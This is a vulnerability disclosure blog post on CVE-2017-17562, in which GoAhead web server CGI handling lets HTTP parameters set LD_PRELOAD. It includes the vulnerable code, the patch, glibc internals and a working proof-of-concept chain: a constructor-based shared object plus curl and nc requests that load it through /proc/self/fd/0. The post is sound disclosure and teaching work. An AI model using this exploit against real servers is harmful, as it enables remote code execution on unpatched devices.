description | ### INTRODUCTION This blog post details [CVE-2017-17562](https://nvd.nist.gov/vuln/detail/CVE-2017-17562), a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5. The vulnerability is a result of Initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and will affect all user’s who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as `LD_PRELOAD` (commonly used to perform function hooking, see [preeny](https://github.com/zardus/preeny)). For those unfamiliar with GoAhead, its [marketing page](https://embedthis.com/goahead/) says that it’s “the world’s most popular, tiny embedded web server” and is used by such companies as IBM, HP, Oracle, Boeing, D-link, and Motorola. We did a search on shodan, and found over 735,000 devices using it on the internet today. Shodan search results ![](https://images.seebug.org/1513654932926) ZoomEye search results ![](https://images.seebug.org/1513657791312-w331s) The exploitation of this issue serves as an interesting case study, and could be applied to other types of software with the same insecure construct. ### VULNERABILITY ANALYSIS This vulnerability has existed in all versions of GoAhead since at least 2.5.0 (we could not find earlier versions to test against). You can follow along by cloning and compiling the repository as follows: Figure-2: Cloning and running the vulnerable GoAhead daemon ``` daniel@makemyday:~$ git clone https://github.com/embedthis/goahead.git Cloning into 'goahead'... remote: Counting objects: 20583, done. remote: Total 20583 (delta 0), reused 0 (delta 0), pack-reused 20583 Receiving objects: 100% (20583/20583), 19.71 MiB | 4.76 MiB/s, done. Resolving deltas: 100% (14843/14843), done. daniel@makemyday:~$ cd goahead/ daniel@makemyday:~/goahead$ ls configure CONTRIBUTING.md doc installs main.me Makefile paks README.md test configure.bat dist farm.json LICENSE.md make.bat package.json projects src daniel@makemyday:~/goahead$ git checkout tags/v3.6.4 -q daniel@makemyday:~/goahead$ make > /dev/null daniel@makemyday:~/goahead$ cd test daniel@makemyday:~/goahead/test$ gcc ./cgitest.c -o cgi-bin/cgitest daniel@makemyday:~/goahead/test$ sudo ../build/linux-x64-default/bin/goahead ``` ### CODE The vulnerability resides in the `cgiHandler` function, which starts by allocating an array of pointers for the `envp` [argument](https://www.gnu.org/software/libc/manual/html_node/Program-Arguments.html) of the new process, followed by initialising it with the key-value pairs taken from HTTP request parameters. Finally, the `launchCgi` function is called which `fork’s` and `execve’s` the CGI script. Besides filtering `REMOTE_HOST` and `HTTP_AUTHORIZATION`, all other parameters are considered trusted and passed along unfiltered. This allows an attacker control over arbitrary environment variables for the new CGI process. This is quite dangerous, as you will see later in the exploitation section. Figure-3: [goahead/src/cgi.c:cgihandler](https://github.com/embedthis/goahead/blob/f9ea55ace3143259095e70c2e05140b1daadadbe/src/cgi.c#L51) ``` ... PUBLIC bool cgiHandler(Webs *wp) { Cgi *cgip; WebsKey *s; char cgiPrefix[ME_GOAHEAD_LIMIT_FILENAME], *stdIn, *stdOut, cwd[ME_GOAHEAD_LIMIT_FILENAME]; char *cp, *cgiName, *cgiPath, **argp, **envp, **ep, *tok, *query, *dir, *extraPath, *exe; CgiPid pHandle; int n, envpsize, argpsize, cid; ... /* Add all CGI variables to the environment strings to be passed to the spawned CGI process. This includes a few we don't already have in the symbol table, plus all those that are in the vars symbol table. envp will point to a walloc'd array of pointers. Each pointer will point to a walloc'd string containing the keyword value pair in the form keyword=value. Since we don't know ahead of time how many environment strings there will be the for loop includes logic to grow the array size via wrealloc. */ envpsize = 64; envp = walloc(envpsize * sizeof(char*)); for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) { if (s->content.valid && s->content.type == string && strcmp(s->name.value.string, "REMOTE_HOST") != 0 && strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) { envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string); trace(5, "Env[%d] %s", n, envp[n-1]); if (n >= envpsize) { envpsize *= 2; envp = wrealloc(envp, envpsize * sizeof(char *)); } } } *(envp+n) = NULL; /* Create temporary file name(s) for the child's stdin and stdout. For POST data the stdin temp file (and name) should already exist. */ if (wp->cgiStdin == NULL) { wp->cgiStdin = websGetCgiCommName(); } stdIn = wp->cgiStdin; stdOut = websGetCgiCommName(); if (wp->cgifd >= 0) { close(wp->cgifd); wp->cgifd = -1; } /* Now launch the process. If not successful, do the cleanup of resources. If successful, the cleanup will be done after the process completes. */ if ((pHandle = launchCgi(cgiPath, argp, envp, stdIn, stdOut)) == (CgiPid) -1) { ... ``` ### PATCH This issue was fixed by skipping special parameter names, and prefixing all others with a static string. This appears to remediate the issue even against parameters of the form `a=b%00LD_PRELOAD%3D` - but please let me know if you find otherwise, I’d love to hear about it! Figure-4: [git diff f9ea55a 6f786c1 src/cgi.c](https://github.com/embedthis/goahead/commit/6f786c123196eb622625a920d54048629a7caa74#diff-7c9c60c790648b06210f57b9e2f53ca7) ``` diff --git a/src/cgi.c b/src/cgi.c index 899ec97b..18d9b45b 100644 --- a/src/cgi.c +++ b/src/cgi.c @@ -160,10 +160,17 @@ PUBLIC bool cgiHandler(Webs *wp) envpsize = 64; envp = walloc(envpsize * sizeof(char*)); for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) { - if (s->content.valid && s->content.type == string && - strcmp(s->name.value.string, "REMOTE_HOST") != 0 && - strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) { - envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string); + if (s->content.valid && s->content.type == string) { + if (smatch(s->name.value.string, "REMOTE_HOST") || + smatch(s->name.value.string, "HTTP_AUTHORIZATION") || + smatch(s->name.value.string, "IFS") || + smatch(s->name.value.string, "CDPATH") || + smatch(s->name.value.string, "PATH") || + sstarts(s->name.value.string, "LD_")) { + continue; + } + envp[n++] = sfmt("%s%s=%s", ME_GOAHEAD_CGI_PREFIX, + s->name.value.string, s->content.value.string); trace(5, "Env[%d] %s", n, envp[n-1]); if (n >= envpsize) { envpsize *= 2; ``` ### EXPLOITATION Although the ability to inject arbitrary environment variables into a new process may seem relatively benign, there are cases where “special” environment variables can lead to alternative control flows for the dynamic linker. ### ELF DYNAMIC LINKER Reading the ELF header of the `goahead` binary, we can see that it’s a 64-bit dynamically-linked executable. The program interpreter is specified in the `INTERP` section and points to `/lib64/ld-linux-x86-64.so.2` (this is the dynamic linker). Figure-5: Reading the ELF header ``` daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -hl ./goahead ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0xf80 Start of program headers: 64 (bytes into file) Start of section headers: 21904 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 9 Size of section headers: 64 (bytes) Number of section headers: 34 Section header string table index: 33 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040 0x00000000000001f8 0x00000000000001f8 R E 0x8 INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238 0x000000000000001c 0x000000000000001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] ... daniel@makemyday:~/goahead/build/linux-x64-default/bin$ ``` The dynamic linker is the first code which runs in a dynamically linked executable, and is responsible for linking and loading shared objects and resolving symbols. To get a list of all the shared objects the `goahead` binary loads, we can set a special environment variable `LD_TRACE_LOADED_OBJECTS` to `1`, which prints the loaded libraries and then exits. Figure-6: ld.so LD_TRACE_LOADED_OBJECTS ``` daniel@makemyday:~/goahead/build/linux-x64-default/bin$ LD_TRACE_LOADED_OBJECTS=1 ./goahead linux-vdso.so.1 => (0x00007fff31bb4000) libgo.so => /home/daniel/goahead/build/linux-x64-default/bin/libgo.so (0x00007f571f548000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f571f168000) libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f571ef49000) /lib64/ld-linux-x86-64.so.2 (0x00007f571f806000) daniel@makemyday:~/goahead/build/linux-x64-default/bin$ ``` We can also find this information statically (without running the dynamic linker), by grepping for DT_NEEDED entries defined in each of the ELF shared objects recursively: Figure-7: statically finding shared object dependancies ``` daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d ./goahead | grep NEEDED 0x0000000000000001 (NEEDED) Shared library: [libgo.so] 0x0000000000000001 (NEEDED) Shared library: [libc.so.6] daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /home/daniel/goahead/build/linux-x64-default/bin/libgo.so | grep NEEDED 0x0000000000000001 (NEEDED) Shared library: [libpthread.so.0] 0x0000000000000001 (NEEDED) Shared library: [libc.so.6] daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /lib/x86_64-linux-gnu/libc.so.6 | grep NEEDED 0x0000000000000001 (NEEDED) Shared library: [ld-linux-x86-64.so.2] daniel@makemyday:~/goahead/build/linux-x64-default/bin$ ``` Note: For the astute reader who noticed these binaries are missing `linux-vdso.so.1`, that’s correct! vDSO is a special shared library mapped into user-space processes by the kernel. See [man 7 vdso](http://man7.org/linux/man-pages/man7/vdso.7.html). ### SPECIAL ENVIRONMENT VARIABLES So that’s good and all, but what does any of this have to do with injecting environment variables? Well … we know the dynamic linker is the first code to execute for a new process - and if we read [man 8 ld.so](http://man7.org/linux/man-pages/man8/ld.so.8.html) we discover there are special environment variables which modify default behavior. As I’m a fan of looking at the source, let us take a journey into what’s happening. The dl_main function is essentially the main entry point of the dynamic linker. Figure-8: [glibc/elf/rtld.c:dl_main](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l865) ``` static void dl_main (const ElfW(Phdr) *phdr, ElfW(Word) phnum, ElfW(Addr) *user_entry, ElfW(auxv_t) *auxv) { const ElfW(Phdr) *ph; enum mode mode; struct link_map *main_map; size_t file_size; char *file; bool has_interp = false; unsigned int i; ... /* Process the environment variable which control the behaviour. */ process_envvars (&mode); ``` One of the first things this function does is call `process_envvars`. Figure-9: [glibc/elf/rtld.c:process_envvars](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l2457) ``` static void process_envvars (enum mode *modep) { char **runp = _environ; char *envline; enum mode mode = normal; char *debug_output = NULL; /* This is the default place for profiling data file. */ GLRO(dl_profile_output) = &"/var/tmp\0/var/profile"[__libc_enable_secure ? 9 : 0]; while ((envline = _dl_next_ld_env_entry (&runp)) != NULL) { size_t len = 0; while (envline[len] != '\0' && envline[len] != '=') ++len; if (envline[len] != '=') /* This is a "LD_" variable at the end of the string without a '=' character. Ignore it since otherwise we will access invalid memory below. */ continue; switch (len) { case 4: /* Warning level, verbose or not. */ if (memcmp (envline, "WARN", 4) == 0) GLRO(dl_verbose) = envline[5] != '\0'; break; case 5: /* Debugging of the dynamic linker? */ if (memcmp (envline, "DEBUG", 5) == 0) { process_dl_debug (&envline[6]); break; } if (memcmp (envline, "AUDIT", 5) == 0) audit_list_string = &envline[6]; break; case 7: /* Print information about versions. */ if (memcmp (envline, "VERBOSE", 7) == 0) { version_info = envline[8] != '\0'; break; } /* List of objects to be preloaded. */ if (memcmp (envline, "PRELOAD", 7) == 0) { preloadlist = &envline[8]; break; } ``` We see that the linker is parsing the `envp` array and exercising different code paths if special variable names are found. What is particularly interesting is `case 7`’s processing of `LD_PRELOAD`, where `preloadlist` is initialised. Figure-10: [glibc/elf/rtld.c:dl_main](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l1606) ``` ... /* We have two ways to specify objects to preload: via environment variable and via the file /etc/ld.so.preload. The latter can also be used when security is enabled. */ assert (*first_preload == NULL); struct link_map **preloads = NULL; unsigned int npreloads = 0; if (__glibc_unlikely (preloadlist != NULL)) { HP_TIMING_NOW (start); npreloads += handle_ld_preload (preloadlist, main_map); HP_TIMING_NOW (stop); HP_TIMING_DIFF (diff, start, stop); HP_TIMING_ACCUM_NT (load_time, diff); } ... ``` Further down in `dl_main`, if `preloadlist` is not `NULL` then the `handle_ld_preload` function is called. Figure-11: [glibc/elf/rtld.c:handle_ld_preload](https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/rtld.c;h=cfd3729b8e7120d7f48c851deae7b6563a8df95e;hb=HEAD#l829) ``` /* The list preloaded objects. */ static const char *preloadlist attribute_relro; /* Nonzero if information about versions has to be printed. */ static int version_info attribute_relro; /* The LD_PRELOAD environment variable gives list of libraries separated by white space or colons that are loaded before the executable's dependencies and prepended to the global scope list. (If the binary is running setuid all elements containing a '/' are ignored since it is insecure.) Return the number of preloads performed. */ unsigned int handle_ld_preload (const char *preloadlist, struct link_map *main_map) { unsigned int npreloads = 0; const char *p = preloadlist; char fname[SECURE_PATH_LIMIT]; while (*p != '\0') { /* Split preload list at space/colon. */ size_t len = strcspn (p, " :"); if (len > 0 && len < sizeof (fname)) { memcpy (fname, p, len); fname[len] = '\0'; } else fname[0] = '\0'; /* Skip over the substring and the following delimiter. */ p += len; if (*p != '\0') ++p; if (dso_name_valid_for_suid (fname)) npreloads += do_preload (fname, main_map, "LD_PRELOAD"); } return npreloads; } ... ``` The `handle_ld_preload` function will parse the `preloadlist` and treat its value as a list of shared objects to be loaded! If we put all this together; with `goahead` enabling us to inject arbitrary environment variables, we can abuse the fact that glibc handles special cases such as `LD_PRELOAD` differently to load arbitrary shared objects that aren’t even listed in the binary! ### ELF .SO So, that’s cool and all - we can force arbitrary shared objects to be loaded. But how does this allow us to run code? Enter the [`.init` and `.fini` sections](http://l4u-00.jinr.ru/usoft/WWW/www_debian.org/Documentation/elf/node3.html). If we wrap a function with a [constructor attribute](https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html) then we can force that function to be called even before `main`. Figure-12: PoC/payload.c ``` #include <unistd.h> static void before_main(void) __attribute__((constructor)); static void before_main(void) { write(1, "Hello: World!\n", 14); } ``` Figure-13: Compiling payload.c as shared object. ``` daniel@makemyday:~/goahead/PoC$ gcc -shared -fPIC ./payload.c -o payload.so daniel@makemyday:~/goahead/PoC$ LD_PRELOAD=./payload.so cat /dev/null Hello: World! daniel@makemyday:~/goahead/PoC$ ``` Sweet! What does this look like if we try this out against GoAhead on our test system? Figure-14: Trying a simple PoC ``` daniel@makemyday:~/goahead/PoC$ ls -la ./payload.so -rwxrwxr-x 1 daniel daniel 7896 Dec 13 17:38 ./payload.so daniel@makemyday:~/goahead/PoC$ echo -en "GET /cgi-bin/cgitest?LD_PRELOAD=$(pwd)/payload.so HTTP/1.0\r\n\r\n" | nc localhost 80 | head -10 HTTP/1.0 200 OK Date: Wed Dec 13 02:38:56 2017 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Pragma: no-cache Cache-Control: no-cache hello: World! content-type: text/html daniel@makemyday:~/goahead/PoC$ ``` We can clearly see that our shared objects code was executed by the `cgitest` process via `LD_PRELOAD`. ### LINUX /PROC/SELF/FD/0 There is still one critical piece of the puzzle that we are missing. Even though we know it’s possible to load arbitrary shared objects from disk, and constructors will allow for code execution - how do we actually inject a malicious shared object into the remote server? After all, if we can’t do that then it’s really unlikely a legitimate shared object on disk will help us. Fortunately, the `launchCgi` method will actually [dup2()](http://man7.org/linux/man-pages/man2/dup.2.html) the stdin file descriptor which points to a temporary file containing the request body of the `POST` request. This means that there will be a file on disk containing user-supplied data and could be referenced with something like `LD_PRELOAD=/tmp/cgi-XXXXXX`. Figure-15: [goahead/src/cgi.c:launchCgi](https://github.com/embedthis/goahead/blob/f9ea55ace3143259095e70c2e05140b1daadadbe/src/cgi.c#L533) ``` /* Launch the CGI process and return a handle to it. */ static CgiPid launchCgi(char *cgiPath, char **argp, char **envp, char *stdIn, char *stdOut) { int fdin, fdout, pid; trace(5, "cgi: run %s", cgiPath); if ((fdin = open(stdIn, O_RDWR | O_CREAT | O_BINARY, 0666)) < 0) { error("Cannot open CGI stdin: ", cgiPath); return -1; } if ((fdout = open(stdOut, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, 0666)) < 0) { error("Cannot open CGI stdout: ", cgiPath); return -1; } pid = vfork(); if (pid == 0) { /* Child */ if (dup2(fdin, 0) < 0) { printf("content-type: text/html\n\nDup of stdin failed\n"); _exit(1); } else if (dup2(fdout, 1) < 0) { printf("content-type: text/html\n\nDup of stdout failed\n"); _exit(1); } else if (execve(cgiPath, argp, envp) == -1) { printf("content-type: text/html\n\nExecution of cgi process failed\n"); } ... } ``` Still, this is kind of annoying (but not impossible) having to remotely guess the temporary filename containing our `POST` payload. Fortunately, the Linux `procfs` filesystem has a nice symbolic link that we can use to reference the stdin descriptor, which points to our temporary file. This can leveraged by pointing `LD_PRELOAD` to `/proc/self/fd/0`. This can also be accessed using `/dev/stdin`. Figure-16: [linux/fs/proc/self.c](https://elixir.free-electrons.com/linux/latest/source/fs/proc/self.c) ``` static const char *proc_self_get_link(struct dentry *dentry, struct inode *inode, struct delayed_call *done) { struct pid_namespace *ns = inode->i_sb->s_fs_info; pid_t tgid = task_tgid_nr_ns(current, ns); char *name; if (!tgid) return ERR_PTR(-ENOENT); /* 11 for max length of signed int in decimal + NULL term */ name = kmalloc(12, dentry ? GFP_KERNEL : GFP_ATOMIC); if (unlikely(!name)) return dentry ? ERR_PTR(-ENOMEM) : ERR_PTR(-ECHILD); sprintf(name, "%d", tgid); set_delayed_call(done, kfree_link, name); return name; } static const struct inode_operations proc_self_inode_operations = { .get_link = proc_self_get_link, }; ``` If we put all this information together, we can reliably exploit the vulnerability by sending a `POST` request containing a malcious shared object which contains a `constructor` to be called when loaded. We also specify an HTTP parameter containing `?LD_PRELOAD=/proc/self/fd/0` which will point to the temporary file on disk containing the attackers payload. At this point it’s game over. Figure-17: exploiting via the command line ``` daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 9931 0 2035 100 7896 2035 7896 0:00:01 0:00:01 --:--:-- 9774 HTTP/1.1 200 OK Date: Sun Dec 17 13:08:20 2017 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Pragma: no-cache Cache-Control: no-cache hello: World! Content-type: text/html daniel@makemyday:~/goahead/PoC$ ``` If you would like a ready-to-go exploit please check out our [advisory repo](https://github.com/elttam/advisories/tree/master/CVE-2017-17562) on GitHub. ### CONCLUSION This vulnerability was an interesting case study in how to remotely exploit `LD_PRELOAD`, and was tested (and worked) against all versions of the GoAhead web server. The construct itself may exist in other services, and it would be interesting to investigate. It may be possible to just use the exploit string and do this blind without actually auditing any code. Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It’s possible there are other interesting vulnerabilities - and for those interested I’d recommend starting with a grep for `websDefineHandler` entry points. If you’re interesting in learning more about linking and loading, there’s a great article [here](https://www.cs.stevens.edu/~jschauma/810/elf.html) and [here](http://s.eresi-project.org/inc/articles/elf-rtld.txt) that we suggest you check out. Thanks for reading! |